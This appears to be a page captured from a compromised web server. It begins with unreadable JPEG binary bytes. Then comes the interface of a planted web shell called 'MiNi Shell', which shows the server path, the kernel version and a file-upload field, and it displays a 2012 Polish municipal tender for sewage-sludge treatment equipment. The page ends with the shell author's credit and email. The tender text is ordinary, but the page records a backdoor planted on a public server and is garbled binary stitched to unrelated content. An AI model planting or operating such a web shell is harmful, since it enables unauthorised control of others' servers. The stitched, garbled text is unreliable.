JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121009/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121009/389052-N-2012.html

<p class="kh_header"><b>Sędziszów Małopolski: DOSTAWA URZĄDZEŃ DO HIGIENIZACJI  I  AGLOMERACJI  KOMUNALNYCH OSADÓW ŚCIEKOWYCH WRAZ  Z  SILOSEM 
NA WAPNO I PODAJNIKAMI DLA OCZYSZCZALNI ŚCIEKÓW 
W SĘDZISZOWIE MAŁOPOLSKIM</b><br>
<b>Numer ogłoszenia: 389052 - 2012; data zamieszczenia: 09.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sędziszów Małopolski , ul. Rynek 1, 39-120 Sędziszów Małopolski, woj. podkarpackie, tel. 17 22 16 001, faks 17 22 16 313.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sedziszow-mlp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA URZĄDZEŃ DO HIGIENIZACJI  I  AGLOMERACJI  KOMUNALNYCH OSADÓW ŚCIEKOWYCH WRAZ  Z  SILOSEM 
NA WAPNO I PODAJNIKAMI DLA OCZYSZCZALNI ŚCIEKÓW 
W SĘDZISZOWIE MAŁOPOLSKIM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia

4.1 Dostawa, montaż i uruchomienie układu składającego się z :

a)	urządzenia do i aglomeracji komunalnych osadów ściekowych wapnem palonym wysokoreaktywnym, o wydajności całkowitej higienizacji produktu ok. 4,5 m3/h
 
b)	zbiornika do magazynowania wapna palonego 

c)	transportera podającego wapno do higienizacji

d)	systemu podajników dostarczających osad z pras do mieszalnika

e)	podajnika transportującego gotowy produkt z urządzenia do higienizacji i aglomeracji osadów na pole osadowe.

Wyżej wymienione Urządzenia muszą spełniać wymagania odpowiednich norm CE. 

4.2 Produktem końcowym procesu powinny być aglomeraty:

a)	kulistym kształcie,
b)	z jednorodnym składem ziarnowym,
c)	charakteryzujące się dobrą sypkością,
d)	niepylące w czasie transportu i składowania,
e)	wielkości granulek do 10 mm. 

4.3	Urządzenia powinny spełniać poniższe parametry:

1)	Proces technologiczny urządzeń powinien zapewnić:

a)	pełną higienizację osadów komunalnych wapnem palonym wysokoreaktywnym,
b)	dozowanie osadu w zakresie 0,3 - 3,0 m3/h ,
c)	precyzyjną i intensywną homogenizację osadu poprzez odpowiednie elementy urządzenia,
d)	brak niekontrolowanego sklepiania się materiału w urządzeniu,
e)	odpowiednią recyrkulację mieszanki w urządzeniu celem zoptymalizowania  procesu oraz kontroli czasu prowadzenia procesu,
f)	ciągłe odprowadzenie produktu - mieszaniny osadu z wapnem w postaci sypkich, kruchych aglomeratów niezależnie od ilości dawkowanego osadu i wapna,
g)	pełne wbudowanie w strukturę osadu dawkowanego wapna palonego wysokoreaktywnego,
h)	kontrolę temperatury procesu poprzez zamontowany termometr.

2)	Wymagania dotyczące wyposażenia oraz jakości wykonania urządzenia do higienizacji                       i aglomeracji komunalnych osadów ściekowych:

a)	urządzenie stacjonarne  zamontowane na konstrukcji wsporczej,
b)	 urządzenie wyposażone w narzędzia mieszające odporne na ścieranie, wykonane z odpowiednich materiałów gwarantujących bezawaryjną pracę urządzenia,
c)	wykonane  ze stali kwasoodpornej lub nierdzewnej  wszystkich elementów części  będących                 w kontakcie  z reagentami i odpornych na temperaturę reakcji wynoszącej 100-150 o C (odporność temperaturowa do 180 o C),
d)	 urządzenie wyposażone w precyzyjną stację dozowania wapna wraz z zasobnikiem buforowym              z zamontowanymi czujnikami poziomu wapna zapewniające optymalne prowadzenie procesu,
e)	 urządzenie powinno spełniać normę co najmniej IP 54,
f)	 technologia procesu musi uwzględniać uwarunkowania wynikające z obiektów budowlanych (pomieszczenia, fundamenty, itp.), w których będą zainstalowane urządzenia jak również               z uwarunkowań urządzeń towarzyszących. Rysunek nr 1 będący załącznikiem nr 5 do SIWZ, przedstawia wzajemne położenie poszczególnych obiektów budowlanych oraz realizowane w nich procesy technologiczne wraz z kierunkiem ich przepływu,
g)	ze względu na istniejące wymiary pomieszczenia gabaryty urządzenia do higienizacji i aglomeracji osadów nie powinny być większe niż:

-	długość: 305 cm  
-	szerokość: 90 cm
-	wysokość: 290 cm 
 
h)	urządzenie będzie zasilane osadem z istniejących pras taśmowych. Na Rysunku, który jest 
    załącznikiem nr 5 do SIWZ pokazany jest punkt, w którym znajdują się wyloty podajników      
    odbierających osad z pras. Urządzenie należy podłączyć do istniejącego układu podajników lub    
    wykonać nowy układ odbioru osadu z pras taśmowych,
i)	urządzenie powinno zapewniać odprowadzenie pary wodnej powstającej podczas   
     procesu higienizacji na zewnątrz budynku.


3)	Wymagania dotyczące wyposażenia oraz jakości wykonania zbiornika do magazynowania wapna palonego wraz z transporterem podającym :

a)	Pojemność użyteczna zbiornika - 20 m3,
b)	Zbiornik powinien być wyposażony w :
1)	Układ załadunku z autocysterny zabezpieczający przed przeładowaniem zbiornika wyposażony w:
- rurociąg DN80,
- zawór odcinający materiał na wlocie do rurociągu,
- syrenę alarmową,
- przyłącze do autocysterny,
2)	Zawór bezpieczeństwa nad i podciśnienia,
3)	Filtr odpylający (renegowany pneumatycznie),
4)	Czujniki poziomu max, min,
5)	Zasuwę płaską sterowaną ręcznie na leju wylotowym,
6)	Układ aeracji leja silosu,
7)	Drabinę umożliwiającą wejście na koronę silosu,
8)	Barierki ochronne na koronie zbiornika,
9)	Właz inspekcyjny na dachu zbiornika,
10)	Konstrukcję wsporczą dopasowaną do istniejącego fundamentu,
c)	Zastosowany układ filtracji powinien gwarantować bezpyłowy załadunek zbiornika z autocysterny
d)	Zastosowany układ aeracji powinien gwarantować bezproblemową swobodną ewakuację materiału ze zbiornika do transportera,
e)	Transporter wapna: 
-	Wydajność	- 2 m3/h,
-	Długość (wlot -wylot) około 8-9 m
-	Wlot : dopasowany do zasuwy płaskiej na zbiorniku 
-	Wylot : dopasowany do średnicy podajnika.
Ostateczną wydajność, długość, kat pracy, średnicę wlotową oraz wylotową należy dopasować do istniejących na oczyszczalni warunków oraz pozostałych urządzeń układu.

4)	Wymagania dotyczące wyposażenia oraz jakości wykonania podajnika transportującego gotowy produkt z urządzenia do higienizacji i aglomeracji osadów na pole osadowe:
Podajnik taśmowy :
- wydajność zapewniająca swobodny odbiór materiału z urządzenia do higienizacji i aglomeracji osadów,
- długość podajnika około 9 000 m,
- szerokość taśmy podajnika zapewniającą prawidłowy odbiór materiału z urządzenia do higienizacji                i aglomeracji osadów oraz poprawną pracę urządzenia.

5)	Wymagania dotyczące układu zasilania i sterowania urządzeniem:

a)	wszelkie niezbędne akcesoria zasilające i sterujące urządzeniem oraz panel kontrolny powinny być zainstalowane w szafie sterowniczej, wszelkie normy bezpieczeństwa w stopniu ochrony spełniające co najmniej normę IP 54,
b)	z uwagi na wymogi precyzyjnego dozowania wapna do urządzenia, system sterowania tym procesem powinien być niezależny od pozostałych elementów procesu,
c)	układ napędowy urządzenia z silnikiem o mocy nie większej niż 11 kW oraz regulowany motoreduktor.
4.4. Wymagania dodatkowe:

1. Urządzenia winny spełniać wymagania norm w zakresie BHP i p. poż.

2. W cenie oferty powinny być uwzględnione wszelkie koszty związane z kompleksową realizacją zamówienia, w tym koszty dostawy na miejsce do użytkownika tj.  opakowanie, ubezpieczenie, transport wraz z rozładunkiem, montażem oraz uruchomieniem w Oczyszczalni  Ścieków                             w Sędziszowie Małopolskim, ulica Borkowska 65.

3. Ponadto Zamawiający wymaga:
a) dostarczenia instrukcji obsługi urządzeń w języku polskim ,
b) zapewnienia serwisu gwarancyjnego.

4. W przypadku towarów zagranicznych Zamawiający ma prawo ubiegać się o zwolnienie z cła na
podstawie obowiązujących przepisów.

5. Urządzenia  stanowiące przedmiot zamówienia muszą być fabrycznie nowe.

6. Dostawa urządzeń ma być zgodna z Warunkami ogólnymi dla dostawy dla urządzeń mechanicznych, elektrycznych i elektronicznych Orgalime S 2000.  

7. Wymagany okres gwarancji - co najmniej 12 miesięcy, licząc od dnia uruchomienia urządzeń na Oczyszczalni  Ścieków w Sędziszowie Małopolskim, ulica Borkowska 65. 

8. Przedmiot zamówienia wg Wspólnego Słownika Zamówień  CPV:
42.99.69.00-3 Urządzenia do obróbki osadów

Uwaga: Zaleca się wykonawcom przeprowadzenie wizji lokalnej przedmiotu zamówienia
w celu uzyskania wszelkich istotnych informacji, które mogą być konieczne do prawidłowego przygotowania oferty, zawarcia umowy i prawidłowej realizacji przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.99.69.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania: Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu - zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2) posiadanie wiedzy i doświadczenia: Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału                           w postępowaniu - zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3) dysponowanie odpowiednim potencjałem technicznym: Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu - zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4) dysponowanie osobami zdolnymi do wykonania zamówienia: Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu - zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5) sytuacja ekonomiczna i finansowa : Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału                 w postępowaniu - zał. nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) Oświadczenie dostawcy poparte odpowiednimi dokumentami, iż posiada stosowne patenty lub inne prawa autorskie do tego urządzenia, pozwalające na wykorzystanie go w technologii higienizacji i aglomeracji komunalnych osadów ściekowych.
b) Oświadczenie dostawcy poparte stosownymi dokumentami, iż urządzenie do higienizacji             i aglomeracji komunalnych osadów ściekowych nie jest stosowane w innych układach technologicznych objętych ochroną patentową lub prawami autorskimi.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. b)	Wykonawca, ubiegający się o niniejsze zamówienie, który polega na wiedzy                       i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolności finansowej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zgodnie z art. 26 ust. 2b ustawy zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (w formie oryginału) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
2. Formularz Oferty.
3. Formularz cenowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Nie będą możliwe istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem następujących przypadków:

a) zmiany terminu realizacji zamówienia ze względu na  niezawinione przez Strony przyczyny spowodowane przez tzw. siłę wyższą np. pożar, zalanie itp.
b) wydłużenia terminu gwarancji, w sytuacji przedłużenia jej przez producenta/Wykonawcę,
c) poprawy jakości lub innych parametrów charakterystycznych dla danego elementu dostawy lub
zmiany technologii na równoważną lub lepszą, podniesienia wydajności urządzenia oraz
bezpieczeństwa, w sytuacji wycofania z rynku przez producenta lub zakończenia produkcji
zaoferowanego przez wykonawcę przedmiotu zamówienia,
d) aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny lub zmianę
obowiązujących przepisów,
e) zmiany kluczowego personelu Wykonawcy lub Zamawiającego (osoby upoważnione do
reprezentowania stron w sprawach związanych z realizacją zamówienia), ze względów losowych,
zdrowotnych lub innych,
f) zmiany stawki podatku VAT.
2. Strona, która występuje z propozycją zmiany umowy obowiązana jest uzasadnić                                          i udokumentować istnienie przesłanki tej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sedziszow-mlp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sędziszowie Małopolskim, ulica Rynek 10, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2012 godzina 11:15, miejsce: Urząd Miejski w Sędziszowie Małopolskim, ulica Rynek 1, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com